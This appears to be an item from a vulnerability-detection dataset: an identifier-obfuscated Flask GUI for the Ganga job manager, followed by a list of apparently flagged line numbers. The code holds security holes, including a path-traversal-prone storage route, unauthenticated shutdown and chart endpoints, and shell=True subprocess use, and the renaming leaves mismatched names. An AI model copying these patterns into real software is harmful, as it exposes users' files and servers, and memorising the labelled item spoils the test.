VAR_73.update({
"recent": True,
"length": VAR_53,
"offset": VAR_51
})
VAR_93 = FUNC_58("/internal/jobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("jobs.html",
title="Jobs",
VAR_93=jobs_info,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_91=number_of_pages,
VAR_51=current_page,
VAR_5=status_color)
@VAR_0.route('/jobs/<int:VAR_9>')
@login_required
def FUNC_11(VAR_9: int):
VAR_54 = None
VAR_55 = None
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
VAR_96 = os.path.join(VAR_94["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_94["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("jobs_page"))
return render_template("job.html",
title=f"Job {VAR_9}",
VAR_94=job_info,
VAR_5=status_color,
attribute_actions=VAR_7.get("attributes"),
method_actions=VAR_7.get("methods"),
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info)
@VAR_0.route("/jobs/<int:VAR_9>/export")
@login_required
def FUNC_12(VAR_9: int):
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], f"export.txt")
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
return send_file(VAR_56, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{VAR_9}.txt")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
@VAR_0.route("/jobs/<int:VAR_9>/edit", methods=["GET", "POST"])
@login_required
def FUNC_13(VAR_9: int):
VAR_57 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "export.txt")
if request.method == "POST":
VAR_99 = request.form.get("edited-job-info")
with open(VAR_57, "w+") as VAR_14:
f.write(VAR_99)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_57})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
with open(VAR_56) as VAR_14:
VAR_121 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("edit_job.html", title=f"Edit Job {VAR_9}", VAR_9=job_id, VAR_121=exported_data)
@VAR_0.route("/job/<int:VAR_9>/browse", defaults={"path": ""})
@VAR_0.route("/job/<int:VAR_9>/browse/<VAR_10:path>")
@login_required
def FUNC_14(VAR_9: int, VAR_10):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_100 = os.path.dirname(os.path.dirname(VAR_94["outputdir"]))
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
VAR_58 = safe_join(VAR_100, VAR_10)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_100, "")
if not os.path.exists(VAR_58):
flash("Directory for this job does not exist.", "warning")
return redirect(url_for("job_page", VAR_9=job_id))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template('job_dir.html', title=f"Job {VAR_9} Directory",
VAR_9=job_id,
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs", methods=["GET", "POST"])
@login_required
def FUNC_15(VAR_9: int):
if request.method == "POST":
session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
VAR_84["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["subjob-status", "subjob-application", "subjob-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_62 = VAR_84["subjobs_per_page"]
try:
VAR_101 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/length", "get",
VAR_73=VAR_84["subjobs_filter"])
VAR_91 = (int(VAR_101) // int(VAR_62)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("subjobs_page", page=VAR_91 - 1, VAR_9=job_id))
params = VAR_84["subjobs_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_62,
"offset": VAR_51
})
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("subjobs.html",
title=f"Subjobs - Job {VAR_9}",
VAR_5=status_color,
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_102=subjobs_info,
VAR_9=job_id)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@login_required
def FUNC_16(VAR_9: int, VAR_11: int):
VAR_54 = None
VAR_55 = None
try:
VAR_103 = FUNC_58(f"/internal/jobs/{VAR_9}/outputdir", "get")
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
VAR_105 = os.path.dirname(os.path.dirname(VAR_103["outputdir"]))
VAR_106 = os.path.dirname(os.path.dirname(VAR_104["outputdir"]))
VAR_107 = VAR_106.replace(VAR_105, "")
VAR_96 = os.path.join(VAR_104["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_104["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("subjobs_page", VAR_9=job_id))
return render_template("subjob.html",
title=f"Subjob {VAR_11} - Job {VAR_9}",
VAR_104=subjob_info,
VAR_5=status_color,
attribute_actions=VAR_7["attributes"],
method_actions=VAR_7["methods"],
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info,
VAR_9=job_id,
VAR_107=browse_path)
@VAR_0.route("/credentials")
@login_required
def FUNC_17():
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('credentials.html', credential_info_list=VAR_108)
@VAR_0.route("/queue", methods=["GET"])
@login_required
def FUNC_18():
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('queue.html', queue_info_list=VAR_109)
@VAR_0.route('/plugins')
@login_required
def FUNC_19():
try:
VAR_110 = VAR_8
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('plugins.html', VAR_110=plugins_info)
@VAR_0.route("/plugin/<VAR_12>")
@login_required
def FUNC_20(VAR_12: str):
try:
VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("plugins_page"))
return render_template("plugin.html", title=f"{VAR_12}", VAR_111=plugin_info)
@VAR_0.route("/logs")
@login_required
def FUNC_21():
VAR_63 = VAR_0.config["GANGA_LOG"]
VAR_64 = VAR_0.config["ACCESS_LOG"]
VAR_65 = VAR_0.config["ERROR_LOG"]
try:
with open(VAR_63, "rt") as VAR_14:
VAR_122 = VAR_14.read()
with open(VAR_64, "rt") as VAR_14:
VAR_123 = VAR_14.read()
with open(VAR_65, "rt") as VAR_14:
VAR_124 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("logs.html", title="Logs", VAR_122=ganga_log_data,
VAR_123=gui_accesslog_data, VAR_124=gui_errorlog_data)
@VAR_0.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@VAR_0.route("/storage/<VAR_10:path>", methods=["GET", "POST"])
@login_required
def FUNC_22(VAR_10):
VAR_66 = VAR_0.config["STORAGE_FOLDER"]
VAR_58 = os.path.join(VAR_66, VAR_10)
if request.method == "POST":
if "storagefile" in request.files:
VAR_125 = request.files["storagefile"]
if VAR_125.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_125:
if not os.path.isdir(VAR_58):
flash("Error while uploading the file", "danger")
return redirect(request.url)
VAR_20 = secure_filename(VAR_125.filename)
VAR_130 = os.path.join(VAR_58, VAR_20)
VAR_125.save(VAR_130)
flash("Successfully uploaded the file.", "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_66, "")
if not os.path.exists(VAR_58):
flash("Directory does not exist.", "warning")
return redirect(url_for("dashboard"))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template("storage.html", title="Storage",
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/cli")
@login_required
def FUNC_23():
return render_template("cli.html")
@VAR_3.on("connect", namespace="/pty")
def FUNC_24():
if VAR_0.config["CHILD_PID"] and current_user.is_authenticated:
VAR_3.start_background_task(target=FUNC_63)
return
@VAR_3.on("pty-input", namespace="/pty")
def FUNC_25(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
os.write(VAR_0.config["FD"], VAR_13["input"].encode())
@VAR_3.on("resize", namespace="/pty")
def FUNC_26(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
FUNC_62(VAR_0.config["FD"], VAR_13["rows"], VAR_13["cols"])
@VAR_0.route("/token", methods=["POST"])
def FUNC_27():
VAR_67 = request.json if request.json else {}
VAR_68 = VAR_67.get("username")
VAR_69 = VAR_67.get("password")
if not VAR_68 or not VAR_69:
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_68).first()
if VAR_37 and VAR_37.verify_password(VAR_69):
VAR_112 = VAR_37.generate_auth_token().decode("UTF-8")
VAR_70 = {"token": VAR_112}
return jsonify(VAR_70)
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
def FUNC_28(VAR_14):
@wraps(VAR_14)
def FUNC_69(*VAR_25, **VAR_23):
VAR_112 = None
if "X-Access-Token" in request.headers:
VAR_112 = request.headers["X-Access-Token"]
if not VAR_112:
return jsonify({"success": False, "message": "Token is missing"}), 401
try:
VAR_13 = jwt.decode(VAR_112, VAR_0.config["SECRET_KEY"], algorithms=["HS256"])
VAR_15 = CLASS_0.query.filter_by(VAR_36=VAR_13["public_id"]).first()
if VAR_15 is None:
return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
except jwt.ExpiredSignatureError:
return jsonify({"success": False, "message": "Token is expired"}), 401
except jwt.InvalidTokenError:
return jsonify({"success": False, "message": "Token is invalid"}), 401
except:
return jsonify({"success": False, "message": "Could not verify token"}), 401
return VAR_14(VAR_15, *VAR_25, **VAR_23)
return FUNC_69
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["GET"])
@FUNC_28
def FUNC_29(VAR_15, VAR_9: int):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_94)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_30(VAR_15, VAR_9: int, VAR_16: str):
try:
VAR_113 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_113)
@VAR_0.route("/api/jobs/<int:VAR_9>/full-print", methods=["GET"])
@FUNC_28
def FUNC_31(VAR_15, VAR_9: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/create", methods=["POST"])
@FUNC_28
def FUNC_32(VAR_15):
VAR_13 = {
"template_id": request.json.get("template_id"),
"job_name": request.json.get("job_name")
}
try:
VAR_98 = FUNC_58("/internal/jobs/create", "post", json=VAR_13)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/copy", methods=["PUT"])
@FUNC_28
def FUNC_33(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_17>", methods=["PUT"])
@FUNC_28
def FUNC_34(VAR_15, VAR_9: int, VAR_17: str):
VAR_71 = request.json
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_17}", "put", json=VAR_71)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["DELETE"])
@FUNC_28
def FUNC_35(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/pin", methods=["PUT"])
@FUNC_28
def FUNC_36(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 not in VAR_40:
pinned_jobs.append(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully pinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/unpin", methods=["PUT"])
@FUNC_28
def FUNC_37(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 in VAR_40:
pinned_jobs.remove(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs", methods=["GET"])
@FUNC_28
def FUNC_38(VAR_15, VAR_9: int):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset")
}
try:
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_102)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@FUNC_28
def FUNC_39(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_104)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_40(VAR_15, VAR_9: int, VAR_11: int, VAR_16: str):
try:
VAR_114 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_114)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/full-print", methods=["GET"])
@FUNC_28
def FUNC_41(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/copy", methods=["PUT"])
@FUNC_28
def FUNC_42(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs", methods=["GET"])
@FUNC_28
def FUNC_43(VAR_15):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
"auto-validate-ids": request.args.get("auto-validate-ids")
}
try:
VAR_93 = FUNC_58(f"/internal/jobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_93)
@VAR_0.route("/api/jobs/statistics", methods=["GET"])
@FUNC_28
def FUNC_44(VAR_15):
try:
VAR_115 = FUNC_58("/internal/jobs/statistics", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_115)
@VAR_0.route("/api/queue", methods=["GET"])
@FUNC_28
def FUNC_45(VAR_15):
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_109)
@VAR_0.route("/api/queue/chart", methods=["GET","POST"])
def FUNC_46():
VAR_74 = FUNC_58("/internal/queue/data", "get")
VAR_75 = make_response(json.dumps(VAR_74))
VAR_75.content_type = 'application/json'
return VAR_75
@VAR_0.route("/api/jobs/incomplete_ids", methods=["GET"])
@FUNC_28
def FUNC_47(VAR_15):
try:
VAR_116 = FUNC_58("/internal/jobs/incomplete-ids", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_116)
@VAR_0.route("/api/config", methods=["GET"], defaults={"section": ""})
@VAR_0.route("/api/config/<VAR_18>", methods=["GET"])
@FUNC_28
def FUNC_48(VAR_15, VAR_18: str):
try:
if VAR_18 != "":
VAR_48 = FUNC_58(f"/internal/config/{VAR_18}", "get")
else:
VAR_48 = FUNC_58("/internal/config", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_48)
@VAR_0.route("/api/templates", methods=["GET"])
@FUNC_28
def FUNC_49(VAR_15):
VAR_73 = {
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
}
try:
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_88)
@VAR_0.route("/api/templates/<int:VAR_19>/full-print", methods=["GET"])
@FUNC_28
def FUNC_50(VAR_15, VAR_19: int):
try:
VAR_95 = FUNC_58(f"/internal/templates/{VAR_19}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/templates/<int:VAR_19>", methods=["DELETE"])
@FUNC_28
def FUNC_51(VAR_15, VAR_19: int):
try:
VAR_98 = FUNC_58(f"/internal/templates/{VAR_19}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/credentials", methods=["GET"])
@FUNC_28
def FUNC_52(VAR_15):
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_108)
@VAR_0.route("/api/credentials/renew", methods=["PUT"])
@FUNC_28
def FUNC_53(VAR_15):
try:
VAR_98 = FUNC_58("/internal/credentials/renew", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobtree", methods=["GET"])
@FUNC_28
def FUNC_54(VAR_15):
try:
VAR_117 = FUNC_58("/internal/jobtree", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_117)
@VAR_0.route("/api/plugins", methods=["GET"])
@FUNC_28
def FUNC_55(VAR_15):
try:
VAR_110 = FUNC_58("/internal/plugins", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_110)
@VAR_0.route("/api/VAR_8/<VAR_12>", methods=["GET"])
@FUNC_28
def FUNC_56(VAR_15, VAR_12: str):
try:
VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_111)
def FUNC_57(VAR_20):
return "." in VAR_20 and VAR_20.rsplit(".", 1)[1].lower() in VAR_6
def FUNC_58(VAR_21: str, VAR_22: str, **VAR_23):
VAR_76 = f"http://localhost:{VAR_0.config['INTERNAL_PORT']}"
if VAR_22 not in ["get", "post", "put", "delete"]:
raise Exception(f"Unsupported VAR_22: {method}")
VAR_77 = getattr(requests, VAR_22)(VAR_76 + VAR_21, **VAR_23)
if VAR_77.status_code != 200:
raise Exception(VAR_77.json().get("message"))
return VAR_77.json()
def FUNC_59():
if "templates_per_page" not in VAR_84:
session["templates_per_page"] = 10
if "templates_filter" not in VAR_84:
session["templates_filter"] = {key: "any" for key in ["application", "backend"]}
if "jobs_per_page" not in VAR_84:
session["jobs_per_page"] = 10
if "jobs_filter" not in VAR_84:
session["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
if "subjobs_per_page" not in VAR_84:
session["subjobs_per_page"] = 10
if "subjobs_filter" not in VAR_84:
session["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
def FUNC_60():
VAR_78 = 0
while True:
try:
VAR_126 = FUNC_58("/ping", "get")
if VAR_126 is True:
return True
except:
time.sleep(2)
print("Internal API server not online (mostly because Ganga is booting up), retrying...")
VAR_78 += 1
if VAR_78 > 20:
return False
def FUNC_61(VAR_24: int, VAR_25: str = ""):
(VAR_79, VAR_26) = pty.fork()
if VAR_79 == 0:
VAR_118 = os.environ.copy()
VAR_118["WEB_CLI"] = "True"
VAR_118["INTERNAL_PORT"] = str(VAR_24)
subprocess.run(f"ganga --webgui {VAR_25}", shell=True, env=VAR_118)
else:
VAR_0.config["FD"] = VAR_26
VAR_0.config["CHILD_PID"] = VAR_79
FUNC_62(VAR_26, 50, 50)
print("Ganga started, PID: ", VAR_79)
def FUNC_62(VAR_26, VAR_27, VAR_28, VAR_29=0, VAR_30=0):
VAR_80 = struct.pack("HHHH", VAR_27, VAR_28, VAR_29, VAR_30)
fcntl.ioctl(VAR_26, termios.TIOCSWINSZ, VAR_80)
def FUNC_63():
VAR_81 = 1024 * 20
while True:
VAR_3.sleep(0.01)
if VAR_0.config["FD"]:
VAR_127 = 0
(VAR_128, VAR_129, _) = select.select([VAR_0.config["FD"]], [], [], VAR_127)
if VAR_128:
VAR_131 = os.read(VAR_0.config["FD"], VAR_81).decode()
VAR_3.emit("pty-output", {"output": VAR_131}, namespace="/pty")
def FUNC_64(VAR_31: str, VAR_32: int, VAR_24: int, VAR_33=True, VAR_34: str = ""):
from GangaGUI.start import create_default_user
VAR_82, VAR_83 = create_default_user()
print(f"Starting the GUI server on http://{VAR_31}:{VAR_32}")
print(f"You VAR_2 information for the GUI is: Username: {VAR_82.user} Password: {VAR_83}")
VAR_0.config["INTERNAL_PORT"] = VAR_24
VAR_0.config["WEB_CLI"] = True
VAR_0.config["GANGA_ARGS"] = VAR_34
VAR_3.run(VAR_0, VAR_31=host, VAR_32=port, VAR_33=log_output) # TODO
@VAR_0.route("/shutdown", methods=["GET"])
def FUNC_65():
if VAR_0.config["WEB_CLI"] is True:
flash("WEB CLI Mode is on, cannot self FUNC_65 server. Consider doing manually.", "warning")
return redirect(url_for("dashboard"))
try:
VAR_98 = FUNC_58("/shutdown", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return "GUI Shutdown Successful."
| [
23,
24,
25,
26,
27,
30,
31,
32,
34,
35,
40,
41,
43,
44,
45,
46,
47,
56,
59,
62,
67,
70,
71,
72,
76,
77,
78,
79,
80,
81,
92,
93,
95,
96,
99,
100,
101,
102,
103,
104,
110,
112,
113,
119,
120,
123,
124,
126,
127,
131,
132,
134,
140,
141,
142,
143,
144,
145,
151,
152,
155,
156,
158,
159,
162,
163,
165,
166,
171,
173,
174,
176,
178,
179,
180,
186,
187,
190,
192,
193,
194,
201,
205,
207,
209,
210,
212,
213,
218,
220,
222,
229,
230,
231,
238,
242,
243,
245,
248,
250,
252,
253,
255,
257,
259,
261,
262,
280,
282,
288,
289,
291,
292,
298,
299,
303,
304,
306,
308,
310,
313,
314,
317,
318,
324,
325,
329,
330,
332,
334,
336,
339,
340,
343,
344,
347,
349,
352,
354,
357,
359,
360,
361,
368,
369,
371,
372,
377,
378,
380,
383,
385,
388,
390,
391,
392,
399,
400,
402,
406,
407,
409,
410,
412,
414,
415,
417,
418,
420,
421,
424,
425,
432,
433,
435,
437,
440,
448,
449,
450,
457,
458,
460,
465,
466,
468,
469,
471,
473,
474,
476,
477,
479,
480,
483,
484,
491,
492,
494,
496,
499,
508,
509,
510,
518,
521,
523,
524,
526,
527,
529,
530,
533,
534,
538,
539,
543,
545,
548,
558,
559,
560,
568,
569,
571,
573,
574,
576,
577,
579,
581,
583,
585,
586,
587,
595,
596,
599,
600,
602,
603,
607,
608,
610,
613,
615,
618,
620,
622,
623,
626,
628,
631,
633,
634,
635,
645,
647,
649,
650,
652,
654,
657,
658,
660,
661,
663,
664,
668,
669,
672,
674,
675,
677,
678,
684,
690,
691,
692,
700,
701,
703,
708,
709,
711,
712,
714,
716,
719,
720,
722,
723,
726,
727,
734,
735,
737,
741,
751,
752,
753,
762,
765,
767,
768,
770,
771,
773,
774,
776,
777,
781,
782,
785,
786,
790,
791,
795,
797,
800,
812,
813,
814,
821,
823,
825,
827,
830,
832,
844,
846,
847,
854,
856,
858,
860,
863,
865,
866,
867,
875,
877,
879,
881,
884,
886,
887,
888,
896,
900,
902,
905,
906,
909,
910,
913,
917,
920,
921,
929,
930,
932,
933,
935,
936,
938,
939,
945,
946,
948,
952,
956,
957,
960,
961,
964,
965,
967,
968,
972,
973,
976,
978,
979,
981,
982,
988,
993,
994,
995,
1000,
1001,
1002,
1008,
1010,
1013,
1014,
1015,
1021,
1024,
1025,
1026,
1033,
1036,
1037,
1038,
1039,
1040,
1046,
1047,
1051,
1052,
1056,
1057,
1063,
1064,
1067,
1068,
1069,
1070,
1071,
1076,
1079,
1081,
1082,
1085,
1088,
1089,
1101,
1103,
1105,
1106,
1107,
1108,
1109,
1110,
1116,
1120,
1122,
1124,
1127,
1129,
1130,
1131,
1137,
1142,
1144,
1146,
1149,
1151,
1152,
1153,
1159,
1163,
1165,
1167,
1170,
1172,
1173,
1174,
1180,
1182,
1185,
1186,
1191,
1193,
1195,
1198,
1200,
1201,
1202,
1211,
1213,
1215,
1218,
1220,
1221,
1222,
1228,
1230,
1234,
1236,
1240,
1242,
1246,
1249,
1251,
1256,
1257,
1259,
1261,
1263,
1266,
1268,
1269,
1270,
1276,
1280,
1282,
1284,
1287,
1289,
1290,
1291,
1300,
1301,
1303,
1304,
1306,
1307,
1310,
1311,
1315,
1317,
1318,
1319,
1328,
1329,
1331,
1332,
1334,
1335,
1338,
1339,
1343,
1345,
1346,
1347,
1348,
1349,
1355,
1365,
1369,
1379,
1381,
1383,
1386,
1388,
1389,
1390,
1396,
1401,
1403,
1405,
1408,
1410,
1411,
1412,
1418,
1424,
1426,
1428,
1431,
1433,
1434,
1435,
1441,
1446,
1448,
1450,
1453,
1455,
1456,
1457,
1467,
1469,
1471,
1474,
1476,
1477,
1478,
1479,
1480,
1486,
1497,
1500,
1511,
1513,
1515,
1518,
1520,
1521,
1522,
1530,
1532,
1536,
1538,
1542,
1545,
1548,
1550,
1553,
1554,
1559,
1560,
1568,
1570,
1572,
1575,
1577,
1578,
1579,
1580,
1581,
1588,
1590,
1593,
1595,
1600,
1603,
1605,
1606,
1607,
1608,
1609,
1615,
1624,
1627,
1635,
1637,
1639,
1642,
1644,
1645,
1646,
1652,
1656,
1658,
1660,
1663,
1665,
1666,
1667,
1672,
1674,
1678,
1680,
1682,
1685,
1687,
1688,
1689,
1690,
1691,
1697,
1700,
1702,
1704,
1707,
1709,
1710,
1711,
1717,
1720,
1722,
1724,
1727,
1729,
1730,
1731,
1732,
1733,
1739,
1742,
1744,
1746,
1749,
1751,
1752,
1753,
1754,
1755,
1761,
1764,
1766,
1768,
1771,
1773,
1774,
1775,
1781,
1785,
1787,
1789,
1792,
1794,
1795,
1796,
1797,
1798,
1801,
1802,
1803,
1810,
1813,
1816,
1817,
1819,
1820,
1823,
1824,
1826,
1827,
1830,
1831,
1833,
1834,
1839,
1840,
1845,
1846,
1851,
1852,
1857,
1858,
1859,
1864,
1873,
1878,
1879,
1886,
1887,
1889,
1891,
1897,
1902,
1903,
1904,
1908,
1909,
1910,
1921,
1922,
1931,
1933,
1934,
1936,
1939,
1944,
1945,
1946,
1947,
1948,
1951,
1955,
1960,
1962,
1963,
1964,
107,
108,
109,
148,
149,
150,
183,
184,
185,
198,
199,
200,
235,
236,
